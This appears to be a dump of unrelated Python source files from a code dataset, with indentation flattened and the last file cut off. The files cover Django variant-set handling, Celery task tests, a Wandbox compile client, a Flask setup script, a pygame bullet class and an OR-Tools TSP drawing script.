feature_disj_intervals[feature][chrom].add(new_ivl)
except:
print ('WARNING: Callable Loci line ' +
'%d: (%s) couldnt be parsed.') % (i, line)
# 2. Associate variants with these intervals
variants = Variant.objects.filter(
variantcallercommondata__alignment_group=\
sample_alignment.alignment_group)
for v in variants:
for feat, chrom_ivls in feature_disj_intervals.items():
# Skip if there is no interval in this chromosome
if v.chromosome.label not in chrom_ivls: continue
if not chrom_ivls[v.chromosome.label]: continue
if v.position in chrom_ivls[v.chromosome.label]:
variants_to_add[feat].append(v)
# 3. Make new variant sets for any features with variants,
# and add the variants to them.
variant_set_to_variant_map = {}
for feat, variants in variants_to_add.items():
(feat_variant_set, created) = VariantSet.objects.get_or_create(
reference_genome=reference_genome,
label=feat)
grouped_uid_dict_list = [{
'sample_uid': experiment_sample.uid,
'variant_uid': v.uid} for v in variants]
variant_uid_to_obj_map = dict([(v.uid,v) for v in variants])
sample_uid_to_obj_map = {experiment_sample.uid: experiment_sample}
_perform_add(grouped_uid_dict_list, feat_variant_set,
variant_uid_to_obj_map, sample_uid_to_obj_map)
variant_set_to_variant_map[feat_variant_set] = variants
return variant_set_to_variant_map
def _initial_validation(uid_data_str_list, action):
"""Initial validation, or why statically compiled languages have their
upsides.
"""
# Make sure we have a valid action.
if not action in VALID_ACTIONS:
return {
'alert_type': 'error',
'alert_msg': 'Bad action type: %s' % action
}
# Make sure uid_data_str_list is properly formatted.
for uid_data_str in uid_data_str_list:
parts = uid_data_str.split(',')
if not (0 < len(parts) <= 2):
return {
'alert_type': 'error',
'alert_msg': 'Bad variant uid / sample uid pair: %s' % uid_data_str
}
# All good. Return filler message.
return {
'alert_type': 'info',
'alert_msg': 'Validation passed.'
}
def _convert_pair_list_into_object_list(uid_data_str_list):
"""Converts the list of pairs into a list of objects with keys:
* variant_uid
* sample_uid
"""
grouped_uid_dict_list = []
for uid_data_str in uid_data_str_list:
parts = uid_data_str.split(',')
variant_uid = parts[0]
if len(parts) > 1:
sample_uid = parts[1]
else:
sample_uid = ''
if UID_REGEX.match(sample_uid):
grouped_uid_dict_list.append({
'variant_uid': variant_uid,
'sample_uid': sample_uid
})
else:
grouped_uid_dict_list.append({
'variant_uid': variant_uid,
'sample_uid': UNDEFINED_STRING
})
return grouped_uid_dict_list
def _get_uid_to_db_object_map(model_class, unique_uid_set,
query_kwargs={}):
"""Queries the database for the given list of uids, returning a map from
uid to Python object.
"""
uid_to_obj_map = {}
query_set = model_class.objects.filter(**query_kwargs).filter(
uid__in=unique_uid_set)
for obj in query_set:
uid_to_obj_map[obj.uid] = obj
return uid_to_obj_map
def _get_cached_uid_to_object_maps(ref_genome, grouped_uid_dict_list):
"""Reduces the number of DB reads necessary to get the associated entities.
"""
unique_variant_uid_set = set(
[group['variant_uid'] for group in grouped_uid_dict_list])
variant_uid_to_obj_map = _get_uid_to_db_object_map(Variant,
unique_variant_uid_set,
{'reference_genome': ref_genome})
unique_sample_uid_set = set([group['sample_uid'] for group
in grouped_uid_dict_list
if not group['sample_uid'] == UNDEFINED_STRING])
sample_uid_to_obj_map = _get_uid_to_db_object_map(ExperimentSample,
unique_sample_uid_set,
{'project': ref_genome.project})
return (variant_uid_to_obj_map, sample_uid_to_obj_map)
def _perform_add(grouped_uid_dict_list, variant_set, variant_uid_to_obj_map,
sample_uid_to_obj_map):
"""
TODO: Instead of looping through variants individually,
create them in one fell swoop, which will be faster.
Args:
grouped_uid_dict_list:
[ {
sample_uid: <SOME_SAMPLE_UID>,
variant_uid: <SOME_VARIANT_UID>}, ...]
variant_set:
<variant set obj to add to>
variant_uid_to_obj_map:
{ <SOME_VARIANT_UID>: <Variant object>, ...}
sample_uid_to_obj_map:
{ <SOME_SAMPLE_UID>: <ExperimentSample object>, ...}
"""
for group in grouped_uid_dict_list:
variant = variant_uid_to_obj_map[group['variant_uid']]
vtvs, created = VariantToVariantSet.objects.get_or_create(
variant=variant,
variant_set=variant_set)
# Maybe add sample association.
sample_uid = group['sample_uid']
if sample_uid == UNDEFINED_STRING:
continue
vtvs.sample_variant_set_association.add(
sample_uid_to_obj_map[sample_uid])
def _perform_remove(grouped_uid_dict_list, variant_set,
variant_uid_to_obj_map, sample_uid_to_obj_map):
for group in grouped_uid_dict_list:
variant = variant_uid_to_obj_map[group['variant_uid']]
try:
vtvs = VariantToVariantSet.objects.get(
variant=variant,
variant_set=variant_set)
except ObjectDoesNotExist:
# It's possible this relation was removed on an earlier
# iteration.
# TODO(gleb): Think about what could go wrong here and add
# tests.
continue
sample_uid = group['sample_uid']
if sample_uid == UNDEFINED_STRING:
# See next for loop.
continue
vtvs.sample_variant_set_association.remove(
sample_uid_to_obj_map[sample_uid])
# Iterate again and destroy any VariantToVariantSet that
# should be completely removed.
for group in grouped_uid_dict_list:
variant = variant_uid_to_obj_map[group['variant_uid']]
try:
vtvs = VariantToVariantSet.objects.get(
variant=variant,
variant_set=variant_set)
except ObjectDoesNotExist:
# It's possible this relation was removed on an earlier
# iteration.
# TODO(gleb): Think about what could go wrong here and add
# tests.
continue
sample_uid = group['sample_uid']
if sample_uid == UNDEFINED_STRING:
if vtvs.sample_variant_set_association.count() == 0:
vtvs.delete()
| StarcoderdataPython |
5009169 | import time
from datetime import timedelta
from celery.result import AsyncResult
from django.utils import timezone
from requests import HTTPError
from . import UBDCBaseTestWorker
from . import get_fixture
from ..errors import UBDCError, UBDCRetriableError
from ..models import AirBnBResponseTypes
from app.operations import (
op_discover_new_listings_periodical,
op_estimate_listings_or_divide_periodical,
op_update_calendar_periodical,
op_update_listing_details_periodical,
op_update_reviews_periodical,
)
# These test represent the X core ops that beat will run periodically
class TestCoreOps(UBDCBaseTestWorker):
fixtures = [
get_fixture("EDIN_AOI_SHAPE.json"),
get_fixture("EDIN_GRID_LISTINGS.json"),
]
def setUp(self):
self.aoi_id = 1
self.listing_404 = 30729869
self.listing_200 = 40197612
self.quadkey = "03113323321103333"
from app.models import UBDCGrid
self.g = UBDCGrid.objects.get(quadkey=self.quadkey)
self.g.datetime_last_estimated_listings_scan = timezone.now() - timedelta(days=10)
self.g.save()
def test_op_discover_new_listings_periodical(self):
task = op_discover_new_listings_periodical.s()
job = task.apply_async()
time.sleep(1)
while not all(list(x.ready() for x in job.children)):
print('waiting...')
time.sleep(1)
self.assertTrue(abs(timezone.now() - self.g.datetime_last_estimated_listings_scan) < timedelta(seconds=20))
def test_op_estimate_listings_or_divide_periodical(self):
task = op_estimate_listings_or_divide_periodical.s()
job = task.apply_async()
time.sleep(1)
while not all(list(x.ready() for x in job.children)):
print('waiting...')
time.sleep(1)
print('waiting...')
def test_op_update_calendar_periodical(self):
task = op_update_calendar_periodical.s(how_many=17_000 * 3)
job = task.apply_async()
time.sleep(1)
while not all(list(x.ready() for x in job.children)):
print('waiting...')
time.sleep(1)
print('waiting...')
def test_op_update_listing_details_periodical(self):
task = op_update_listing_details_periodical.s()
job = task.apply_async()
time.sleep(2)
while not all(list(x.ready() for x in job.children)):
print('waiting...')
time.sleep(1)
print('waiting...')
def test_op_update_reviews_periodical(self):
task = op_update_reviews_periodical.s(how_many=50)
job = task.apply_async()
time.sleep(1)
while not all(list(x.ready() for x in job.children)):
print('waiting...')
time.sleep(1)
print('waiting...')
| StarcoderdataPython |
3383109 | # Multiplication table (from 1 to 10) in Python
num = 19
# To take input from the user
# num = int(input("Display multiplication table of? "))
# Iterate 10 times from i = 1 to 10
for i in range(1, 11):
print(num, 'x', i, '=', num * i)
try:
print(9 / 0)
except:
print("An error has occured, cant be divided by zero")
| StarcoderdataPython |
1819899 | #!/usr/bin/env python
#
# iuwandbox.py
#
# Copyright (C) 2014-2018, <NAME>
# This software is released under the new BSD License,
# see LICENSE
#
import os
import sys
import re
import codecs
import argparse
from time import sleep
from argparse import ArgumentParser
from wandbox import Wandbox
from requests.exceptions import HTTPError
from requests.exceptions import ConnectionError
IUTEST_FUSED_SRC = os.path.normpath(os.path.join(os.path.dirname(__file__), '../../fused-src/iutest.min.hpp'))
IUTEST_INCLUDE_PATH = os.path.normpath(os.path.join(os.path.dirname(__file__), '../../include'))
IUTEST_INCLUDE_REGEX = re.compile(r'^\s*#\s*include\s*".*(iutest|iutest_switch)\.hpp"')
EXPAND_INCLUDE_REGEX = re.compile(r'^\s*#\s*include\s*"(.*?)"')
IUTEST_INCG_REGEX = re.compile(r'\s*#\s*define[/\s]*(INCG_IRIS_\S*)\s*')
iutest_incg_list = []
workaround = True
api_retries = 3
api_retry_wait = 60
# command line option
def parse_command_line():
global api_retries
global api_retry_wait
parser = ArgumentParser()
parser.add_argument(
'-v',
'--version',
action='version',
version=u'%(prog)s version 5.9'
)
parser.add_argument(
'--list-compiler',
'--list_compiler',
action='store_true',
help='listup compiler.'
)
parser.add_argument(
'--list-options',
'--list_options',
metavar='COMPILER',
help='listup compiler options.'
)
parser.add_argument(
'-c',
'--compiler',
default='gcc-head',
help='compiler select. default: %(default)s'
)
parser.add_argument(
'-x',
'--options',
help='used options for a compiler.'
)
parser.add_argument(
'--default',
action='store_true',
help='--default option is deprecated. default options are always set.'
)
parser.add_argument(
'--no-default',
action='store_true',
help='no set default options.'
)
parser.add_argument(
'--std',
metavar='VERSION',
help='set --std options.'
)
parser.add_argument(
'--boost',
metavar='VERSION',
help='set boost options version X.XX or nothing.'
)
parser.add_argument(
'--optimize',
action='store_true',
help='use optimization.'
)
parser.add_argument(
'--cpp-verbose',
action='store_true',
help='use cpp-verbose.'
)
parser.add_argument(
'--sprout',
action='store_true',
help='use sprout.'
)
parser.add_argument(
'--msgpack',
action='store_true',
help='use msgpack.'
)
parser.add_argument(
'--stdin',
help='set stdin.'
)
parser.add_argument(
'-f',
'--compiler-option-raw',
'--compiler_option_raw',
metavar='OPTIONS',
action='append',
default=['-D__WANDBOX__'],
help='compile-time any additional options.'
)
parser.add_argument(
'-r',
'--runtime-option-raw',
'--runtime_option_raw',
metavar='OPTIONS',
action='append',
help='runtime-time any additional options.'
)
parser.add_argument(
'-s',
'--save',
action='store_true',
help='generate permanent link.'
)
parser.add_argument(
'--permlink',
metavar='ID',
help='get permanent link.'
)
parser.add_argument(
'-o',
'--output',
metavar='FILE',
help='output source code.'
)
parser.add_argument(
'--xml',
metavar='FILE',
help='output result xml.'
)
parser.add_argument(
'--junit',
metavar='FILE',
help='output result junit xml.'
)
parser.add_argument(
'--stderr',
action='store_true',
help='output stderr.'
)
parser.add_argument(
'--encoding',
help='set encoding.'
)
parser.add_argument(
'--expand-include',
'--expand_include',
action='store_true',
help='expand include file.'
)
parser.add_argument(
'--make',
action='store_true',
help=argparse.SUPPRESS
)
parser.add_argument(
'--retry-wait',
type=int,
default=api_retry_wait,
metavar='SECONDS',
help='Wait time for retry when HTTPError occurs'
)
parser.add_argument(
'--retry',
type=int,
default=api_retries,
metavar='COUNT',
help='Number of retries when HTTPError occurs'
)
parser.add_argument(
'--check-config',
'--check_config',
action='store_true',
help='check config.'
)
parser.add_argument(
'--iutest-use-main',
action='store_true',
help='define IUTEST_USE_MAIN.'
)
parser.add_argument(
'--verbose',
action='store_true',
help='verbose.'
)
parser.add_argument(
'--dryrun',
action='store_true',
help='dryrun.'
)
parser.add_argument(
'code',
metavar='CODE',
nargs='*',
help='source code file'
)
options = parser.parse_args()
api_retries = options.retry
api_retry_wait = options.retry_wait
return options, parser
# file open
def file_open(path, mode, encoding):
if encoding:
file = codecs.open(path, mode, encoding)
else:
file = open(path, mode)
return file
# make include filename
def make_include_filename(path, includes, included_files):
if path in included_files:
return included_files[path]
include_dir, include_filename = os.path.split(path)
while include_filename in includes:
include_dir, dirname = os.path.split(include_dir)
include_filename = dirname + '__' + include_filename
included_files[path] = include_filename
return include_filename
def is_iutest_included_file(filepath):
if os.path.abspath(filepath).startswith(IUTEST_INCLUDE_PATH):
incg = 'INCG_IRIS_' + os.path.basename(filepath).upper().replace('.', '_')
for included_incg in iutest_incg_list:
if included_incg.startswith(incg):
return True
return False
# make code
def make_code(path, encoding, expand, includes, included_files):
code = ''
file = file_open(path, 'r', encoding)
for line in file:
m = IUTEST_INCLUDE_REGEX.match(line)
if m:
code += '#include "iutest.hpp"\n'
code += '//origin>> ' + line
if 'iutest.hpp' not in includes:
try:
f = codecs.open(IUTEST_FUSED_SRC, 'r', 'utf-8-sig')
iutest_src = f.read()
f.close()
includes['iutest.hpp'] = iutest_src
global iutest_incg_list
iutest_incg_list = IUTEST_INCG_REGEX.findall(iutest_src)
except:
print('{0} is not found...'.format(IUTEST_FUSED_SRC))
print('please try \"make fused\"')
exit(1)
else:
m = EXPAND_INCLUDE_REGEX.match(line)
if m:
include_path = os.path.normpath(os.path.join(os.path.dirname(path), m.group(1)))
if is_iutest_included_file(include_path):
code += '//origin>> '
elif os.path.exists(include_path):
if expand:
expand_include_file_code = make_code(
include_path, encoding, expand, includes, included_files)
code += expand_include_file_code
code += '//origin>> '
else:
include_abspath = os.path.abspath(include_path)
include_filename = make_include_filename(
include_abspath, includes, included_files)
if not include_filename == include_path:
code += '#include "' + include_filename + '"\n'
code += '//origin>> '
if include_filename not in includes:
includes[include_filename] = ''
expand_include_file_code = make_code(
include_path, encoding, expand, includes, included_files)
includes[include_filename] = expand_include_file_code
code += line
file.close()
return code
def print_undefined_option(option_name, compiler):
print('Wandbox is not supported option [{0}] ({1})'.format(option_name, compiler))
def change_std_option(options, new_value):
print(' change std option: {0} -> {1}'.format(options.std, new_value))
options.std = new_value
def check_std_option_compatible(options, old, new, optlist):
if (options.std == old) and (new in optlist):
print(' [{0}] is not supported option. you can use [{1}]'.format(old, new))
change_std_option(options, new)
return True
elif (options.std == new) and (old in optlist):
print(' [{0}] is not supported option. you can use [{1}]'.format(new, old))
change_std_option(options, old)
return True
return False
# check config
def check_config(options):
has_error = False
if not find_compiler(options.compiler):
print('Wandbox is not supported compiler [' + options.compiler + ']')
listup_compiler(options.verbose)
has_error = True
if options.options or options.std:
opt = get_options(options.compiler)
if options.options:
for o in options.options.split(','):
if o not in opt:
print_undefined_option(o, options.compiler)
has_error = True
if options.std:
if options.std not in opt:
print_undefined_option(options.std, options.compiler)
prev_std_option = options.std
if check_std_option_compatible(options, 'c++1z', 'c++17', opt) or \
check_std_option_compatible(options, 'gnu++1z', 'gnu++17', opt) or \
check_std_option_compatible(options, 'c++1y', 'c++14', opt) or \
check_std_option_compatible(options, 'gnu++1y', 'gnu++14', opt) or \
check_std_option_compatible(options, 'c++0x', 'c++11', opt) or \
check_std_option_compatible(options, 'gnu++0x', 'gnu++11', opt):
pass
if (options.std == prev_std_option):
has_error = True
if has_error:
listup_options(options.compiler)
if has_error:
sys.exit(1)
if options.default:
print('--default option is deprecated. default options are always set.')
# setup additional files
def add_files(w, fileinfos):
for filename, code in fileinfos.items():
w.add_file(filename, code)
# create opt list
def create_option_list(options):
def filterout_cppver(opt):
tmp = list(filter(lambda s: s.find('c++') == -1, opt))
tmp = list(filter(lambda s: s.find('gnu++') == -1, tmp))
return tmp
opt = []
if not options.no_default:
opt = get_default_options(options.compiler)
if options.options:
for o in options.options.split(','):
if o not in opt:
if (o.find('c++') == 0) or (o.find('gnu++') == 0):
opt = filterout_cppver(opt)
opt.append(o)
# std
if options.std:
opt = filterout_cppver(opt)
opt.append(options.std)
# optimize
if options.optimize and ('optimize' not in opt):
opt.append('optimize')
# cpp-verbose
if options.cpp_verbose and ('cpp-verbose' not in opt):
opt.append('cpp-verbose')
# boost
if workaround:
pass
# if options.compiler in ['clang-3.4', 'clang-3.3']:
# if not options.boost:
# options.boost = 'nothing'
if options.boost:
if options.compiler not in options.boost:
options.boost = options.boost + '-' + options.compiler
opt = list(filter(lambda s: s.find('boost') == -1, opt))
opt.append('boost-' + str(options.boost))
# sprout
if options.sprout and ('sprout' not in opt):
opt.append('sprout')
# msgpack
if options.msgpack and ('msgpack' not in opt):
opt.append('msgpack')
return opt
def expand_wandbox_options(w, compiler, options):
colist = []
defs = {}
for d in w.get_compiler_list():
if d['name'] == compiler:
if 'switches' in d:
switches = d['switches']
for s in switches:
if ('name' in s) and ('display-flags' in s):
defs[s['name']] = s['display-flags']
elif 'options' in s:
for o in s['options']:
if ('name' in o) and ('display-flags' in o):
defs[o['name']] = o['display-flags']
for opt in options:
if opt in defs:
colist.extend(defs[opt].split())
return colist
def wandbox_api_call(callback, retries, retry_wait):
try:
return callback()
except (HTTPError, ConnectionError) as e:
def is_retry(e):
if not e.response:
return True
return e.response.status_code in [504]
if is_retry(e) and retries > 0:
try:
print(e.message)
except:
pass
print('wait {0}sec...'.format(retry_wait))
sleep(retry_wait)
return wandbox_api_call(callback, retries - 1, retry_wait)
else:
raise
except:
raise
def wandbox_get_compilerlist():
return wandbox_api_call(Wandbox.GetCompilerList, api_retries, api_retry_wait)
def wandbox_get_compilerswitches(compiler):
for d in wandbox_get_compilerlist():
if d['name'] == compiler:
if 'switches' in d:
return d['switches']
return []
def run_wandbox_impl(w, options):
if options.dryrun:
sys.exit(0)
retries = options.retry
def run():
return w.run()
return wandbox_api_call(run, retries, options.retry_wait)
def create_compiler_raw_option_list(options):
colist = []
if options.compiler_option_raw:
raw_options = options.compiler_option_raw
for x in raw_options:
colist.extend(re.split('\s(?=-)', x.strip('"')))
if options.iutest_use_main:
colist.append('-DIUTEST_USE_MAIN')
return colist
# run wandbox (makefile)
def run_wandbox_make(main_filepath, code, includes, impliments, options):
with Wandbox() as w:
w.compiler('bash')
woptions = create_option_list(options)
if options.stdin:
w.stdin(options.stdin)
impliments[os.path.basename(main_filepath)] = code
colist = create_compiler_raw_option_list(options)
colist.extend(expand_wandbox_options(w, options.compiler, woptions))
rolist = []
if options.runtime_option_raw:
for opt in options.runtime_option_raw:
rolist.extend(opt.split())
makefile = '#!/bin/make\n# generate makefile by iuwandbox.py\n'
makefile += '\nCXXFLAGS+='
for opt in colist:
makefile += opt + ' '
makefile += '\nOBJS='
for filename in impliments.keys():
makefile += os.path.splitext(filename)[0] + '.o '
makefile += '\n\
prog: $(OBJS)\n\
\t$(CXX) -o $@ $^ $(CXXFLAGS) $(LDFLAGS)\n\
'
impliments['Makefile'] = makefile
bashscript = 'make -j 4\n'
bashscript += './prog '
for opt in rolist:
bashscript += opt + ' '
bashscript += '\n'
w.code(bashscript)
if options.save:
w.permanent_link(options.save)
if options.verbose:
w.dump()
add_files(w, impliments)
add_files(w, includes)
return run_wandbox_impl(w, options)
# run wandbox (cxx)
def run_wandbox_cxx(code, includes, impliments, options):
with Wandbox() as w:
w.compiler(options.compiler)
w.options(','.join(create_option_list(options)))
if options.stdin:
w.stdin(options.stdin)
colist = create_compiler_raw_option_list(options)
if workaround:
if options.compiler in ['clang-3.2']:
colist.append('-ftemplate-depth=1024')
# if options.compiler in ['clang-3.4']:
# colist.append('-DIUTEST_HAS_HDR_CXXABI=0')
# if options.compiler in ['clang-3.3', 'clang-3.2', 'clang-3.1', 'clang-3.0']:
# colist.append('-Qunused-arguments')
# if options.compiler in ['clang-3.4', 'clang-3.3']:
# colist.append('-fno-exceptions')
# colist.append('-fno-rtti')
pass
if colist:
co = '\n'.join(colist)
co = co.replace('\\n', '\n')
w.compiler_options(co)
if options.runtime_option_raw:
rolist = []
for opt in options.runtime_option_raw:
rolist.extend(opt.split())
ro = '\n'.join(rolist)
ro = ro.replace('\\n', '\n')
w.runtime_options(ro)
if options.save:
w.permanent_link(options.save)
for filename in impliments.keys():
w.add_compiler_options(filename)
if options.verbose:
w.dump()
w.code(code)
add_files(w, impliments)
add_files(w, includes)
return run_wandbox_impl(w, options)
# run wandbox
def run_wandbox(main_filepath, code, includes, impliments, options):
if options.make:
return run_wandbox_make(main_filepath, code, includes, impliments, options)
return run_wandbox_cxx(code, includes, impliments, options)
def wandbox_hint(r):
if 'compiler_error' in r:
if 'undefined reference to `main' in r['compiler_error']:
print('hint:')
print(' In "iutest" you can omit the definition of the main function, please define IUTEST_USE_MAIN. (--iutest-use-main or -f"-DIUTEST_USE_MAIN")')
elif 'undefined reference to `init_unit_test_suite' in r['compiler_error']:
print('hint:')
print(' If you do not use boost test, please specify the file with the main function first.')
def text_transform(value):
try:
if isinstance(value, str):
return value.decode()
elif isinstance(value, unicode):
return value.encode('utf_8')
except:
pass
return value
# show result
def show_result(r, options):
if r is None:
print('failed: timeout...')
sys.exit(1)
if 'error' in r:
print(r['error'])
sys.exit(1)
if options.stderr:
if 'compiler_output' in r:
print('compiler_output:')
print(text_transform(r['compiler_output']))
if 'compiler_error' in r:
sys.stderr.write(text_transform(r['compiler_error']))
if 'program_output' in r:
print('program_output:')
print(text_transform(r['program_output']))
if options.xml is None and options.junit is None and 'program_error' in r:
sys.stderr.write(text_transform(r['program_error']))
else:
if 'compiler_message' in r:
print('compiler_message:')
print(text_transform(r['compiler_message']))
if 'program_message' in r:
print('program_message:')
print(text_transform(r['program_message']))
if 'url' in r:
print('permlink: ' + r['permlink'])
print('url: ' + r['url'])
if 'signal' in r:
print('signal: ' + r['signal'])
wandbox_hint(r)
if 'status' in r:
return int(r['status'])
return 1
# show parameter
def show_parameter(r):
if 'compiler' in r:
print('compiler:' + r['compiler'])
if 'options' in r:
print('options:' + r['options'])
if 'compiler-option-raw' in r:
print('compiler-option-raw:' + r['compiler-option-raw'])
if 'runtime-option-raw' in r:
print('runtime-option-raw' + r['runtime-option-raw'])
if 'created-at' in r:
print(r['created-at'])
def set_output_xml(options, t, xml):
options.stderr = True
if options.runtime_option_raw:
options.runtime_option_raw.append('--iutest_output=' + t + ':' + xml)
else:
options.runtime_option_raw = ['--iutest_output=' + t + ':' + xml]
def run(options):
main_filepath = options.code[0].strip()
if not os.path.exists(main_filepath):
sys.exit(1)
includes = {}
included_files = {}
impliments = {}
code = make_code(main_filepath, options.encoding, options.expand_include, includes, included_files)
for filepath_ in options.code[1:]:
filepath = filepath_.strip()
impliments[os.path.basename(filepath)] = make_code(filepath, options.encoding, options.expand_include, includes, included_files)
if options.output:
f = file_open(options.output, 'w', options.encoding)
f.write(code)
f.close()
xml = None
if options.xml:
xml = options.xml
set_output_xml(options, 'xml', xml)
if options.junit:
xml = options.junit
set_output_xml(options, 'junit', xml)
r = run_wandbox(main_filepath, code, includes, impliments, options)
b = show_result(r, options)
if xml and 'program_error' in r:
f = file_open(xml, 'w', options.encoding)
f.write(r['program_error'])
f.close()
sys.exit(b)
# listup compiler
def listup_compiler(verbose):
r = wandbox_get_compilerlist()
for d in r:
if d['language'] == 'C++':
if verbose:
print(d['name'] + ' (' + d['version'] + ')')
else:
print(d['name'])
# find compiler
def find_compiler(c):
r = wandbox_get_compilerlist()
for d in r:
if d['language'] == 'C++' and d['name'] == c:
return True
return False
# listup options
def listup_options(compiler):
r = wandbox_get_compilerlist()
for d in r:
if d['name'] == compiler:
print('# ' + compiler)
if 'switches' in d:
switches = d['switches']
for s in switches:
if 'name' in s:
if s['default']:
print(s['name'] + ' (default)')
else:
print(s['name'])
elif 'options' in s:
print(s['default'] + ' (default)')
for o in s['options']:
print(' ' + o['name'])
def get_options(compiler):
opt = []
for s in wandbox_get_compilerswitches(compiler):
if 'name' in s:
opt.append(s['name'])
elif 'options' in s:
opt.append(s['default'])
for o in s['options']:
opt.append(o['name'])
return opt
# get default options
def get_default_options(compiler):
opt = []
for s in wandbox_get_compilerswitches(compiler):
if 'name' in s:
if s['default']:
opt.append(s['name'])
elif 'options' in s:
opt.append(s['default'])
return opt
# get permlink
def get_permlink(options):
r = Wandbox.GetPermlink(options.permlink)
p = r['parameter']
show_parameter(p)
print('result:')
b = show_result(r['result'], options)
if options.output:
f = open(options.output, 'w')
f.write(p['code'])
f.close()
sys.exit(b)
def main():
options, parser = parse_command_line()
if options.list_compiler:
listup_compiler(options.verbose)
elif options.list_options:
listup_options(options.list_options)
elif options.permlink:
get_permlink(options)
else:
if options.check_config:
check_config(options)
elif not options.code:
parser.print_help()
sys.exit(1)
run(options)
if __name__ == '__main__':
main()
| StarcoderdataPython |
4972729 | from project.models import db, Term, Translation
from app import app
from flask import current_app
with app.app_context():
db.create_all()
| StarcoderdataPython |
277495 | import pygame
from Tile import Tile
from Zombie import Zombie
from Character import Direction
__author__ = '<NAME>, <NAME>, <NAME>'
class Bullet(pygame.Rect):
# Why this default width and height values here?
# width, height = 7, 10
list_ = []
SHOTGUN_BULLET_DISTANCE = 50
PISTOL_BULLET_DISTANCE = 30
LAST_BULLET_INDEX = -1
_weapon_bullet_images = {'pistol': pygame.image.load('images/weapon/pistol_b.png'),
'shotgun': pygame.image.load('images/weapon/shotgun_b.png'),
'automatic': pygame.image.load('images/weapon/automatic_b.png')}
_gun_damage = {'pistol': (Zombie.START_HEALTH / 3) + 1,
'shotgun': Zombie.START_HEALTH / 2,
'automatic': (Zombie.START_HEALTH / 6) + 1}
def __init__(self, x, y, velx, vely, direction, type_):
# Restricts the firing rate of the shotgun and the pistol
if Bullet.__firing_rate_check(x, y, type_):
self.type = type_
self.direction = direction
self.velx, self.vely = velx, vely
self.__rotation_transformation(direction, type_)
pygame.Rect.__init__(self, x, y, self.img.get_width(), self.img.get_height())
Bullet.list_.append(self)
# Check if the last bullet fired was far enough from the
# previous bullet to shoot another one
@staticmethod
def __firing_rate_check(x, y, gun_type):
# We have some existing bullets
if len(Bullet.list_) > 0:
# Get the x & y differences to the last bullet created
dx = abs( Bullet.list_[Bullet.LAST_BULLET_INDEX].x - x )
dy = abs( Bullet.list_[Bullet.LAST_BULLET_INDEX].y - y )
# Since the Bullet is either moving in the x or y plane, thus either dy or dx will be zero.
# Grab whichever is NOT zero
distance_to_last_bullet = max(dy, dx)
if gun_type == 'shotgun':
if distance_to_last_bullet < Bullet.SHOTGUN_BULLET_DISTANCE:
return False
elif gun_type == 'pistol':
if distance_to_last_bullet < Bullet.PISTOL_BULLET_DISTANCE:
return False
return True
# Change the image direction of the bullet
def __rotation_transformation(self, direction, type_):
if direction == Direction.NORTH:
# Just rotate clockwise 90 degrees is enough
self.img = pygame.transform.rotate(Bullet._weapon_bullet_images[type_], -90)
elif direction == Direction.SOUTH:
self.img = pygame.transform.rotate(Bullet._weapon_bullet_images[type_], 90) # CCW
elif direction == Direction.EAST:
self.img = pygame.transform.flip(Bullet._weapon_bullet_images[type_], True, False)
elif direction == Direction.WEST:
self.img = Bullet._weapon_bullet_images[type_]
# Returns a boolean value on whether or not the bullet is off the screen
def offscreen(self, screen):
if self.x < 0: # left side
return True
elif self.y < 0: # up
return True
elif self.x + self.width > screen.get_width(): # right edge
return True
elif self.y + self.height > screen.get_height(): # down
return True
return False
@staticmethod
def update(screen):
for bullet in Bullet.list_:
# update bullet position
bullet.x += bullet.velx
bullet.y += bullet.vely
# draw bullet on screen
screen.blit(bullet.img, (bullet.x, bullet.y))
if bullet.offscreen(screen):
Bullet.list_.remove(bullet)
continue
# Check if any bullet has hit a zombie
for zombie in Zombie.list_:
if bullet.colliderect(zombie):
zombie.health -= Bullet._gun_damage[bullet.type]
Bullet.list_.remove(bullet)
break
# Check if a bullet has hit a wall
for tile in Tile.list_:
rect = pygame.Rect(bullet.x + bullet.velx, bullet.y + bullet.vely, bullet.width, bullet.height)
if rect.colliderect(tile) and not(tile.walkable):
# I think the try block is because we might have already removed this bullet
# when it hit a zombie?
try:
Bullet.list_.remove(bullet)
except:
break
| StarcoderdataPython |
12852288 | <reponame>wenderlemes/gcc218_trabalho_pratico<filename>draw-tsp-path.py
"""Modified code from https://developers.google.com/optimization/routing/tsp#or-tools """
# Copyright <NAME> (c) 2020 under CC-BY 4.0: https://creativecommons.org/licenses/by/4.0/
from __future__ import print_function
import math
from ortools.constraint_solver import routing_enums_pb2
from ortools.constraint_solver import pywrapcp
from PIL import Image, ImageDraw
import os
import time
import copy
from itertools import permutations
# Change these file names to the relevant files.
ORIGINAL_IMAGE = "images/brother-1024-stipple.png"
IMAGE_TSP = "images/brother-1024-stipple.tsp"
# Change the number of points according to the base tsp file you are using.
NUMBER_OF_POINTS = 1024
NUMBER_OF_PARTITIONS = 8
INITIAL_VERTEX = 0
def create_data_model():
"""Stores the data for the problem."""
# Extracts coordinates from IMAGE_TSP and puts them into an array
list_of_nodes = []
with open(IMAGE_TSP) as f:
for _ in range(6):
next(f)
for line in f:
i,x,y = line.split()
list_of_nodes.append((int(float(x)),int(float(y))))
data = {}
# Locations in block units
data['locations'] = list_of_nodes # yapf: disable
data['num_vehicles'] = 1
data['depot'] = 0
return data
def compute_euclidean_distance_matrix(locations):
"""Creates callback to return distance between points."""
distances = {}
for from_counter, from_node in enumerate(locations):
distances[from_counter] = {}
for to_counter, to_node in enumerate(locations):
if from_counter == to_counter:
distances[from_counter][to_counter] = 0
else:
# Euclidean distance
distances[from_counter][to_counter] = (int(
math.hypot((from_node[0] - to_node[0]),
(from_node[1] - to_node[1]))))
return distances
def print_solution(manager, routing, solution):
"""Prints solution on console."""
print('Objective: {}'.format(solution.ObjectiveValue()))
index = routing.Start(0)
plan_output = 'Route:\n'
route_distance = 0
while not routing.IsEnd(index):
plan_output += ' {} ->'.format(manager.IndexToNode(index))
previous_index = index
index = solution.Value(routing.NextVar(index))
route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)
plan_output += ' {}\n'.format(manager.IndexToNode(index))
print(plan_output)
plan_output += 'Objective: {}m\n'.format(route_distance)
def get_routes(solution, routing, manager):
"""Get vehicle routes from a solution and store them in an array."""
# Get vehicle routes and store them in a two dimensional array whose
# i,j entry is the jth location visited by vehicle i along its route.
routes = []
for route_nbr in range(routing.vehicles()):
index = routing.Start(route_nbr)
route = [manager.IndexToNode(index)]
#while not routing.IsEnd(index):
# index = solution.Value(routing.NextVar(index))
counter = 0
while counter < len(solution):
counter += 1
index = solution[index]
route.append(manager.IndexToNode(index))
routes.append(route)
return routes[0]
def draw_routes(nodes, path):
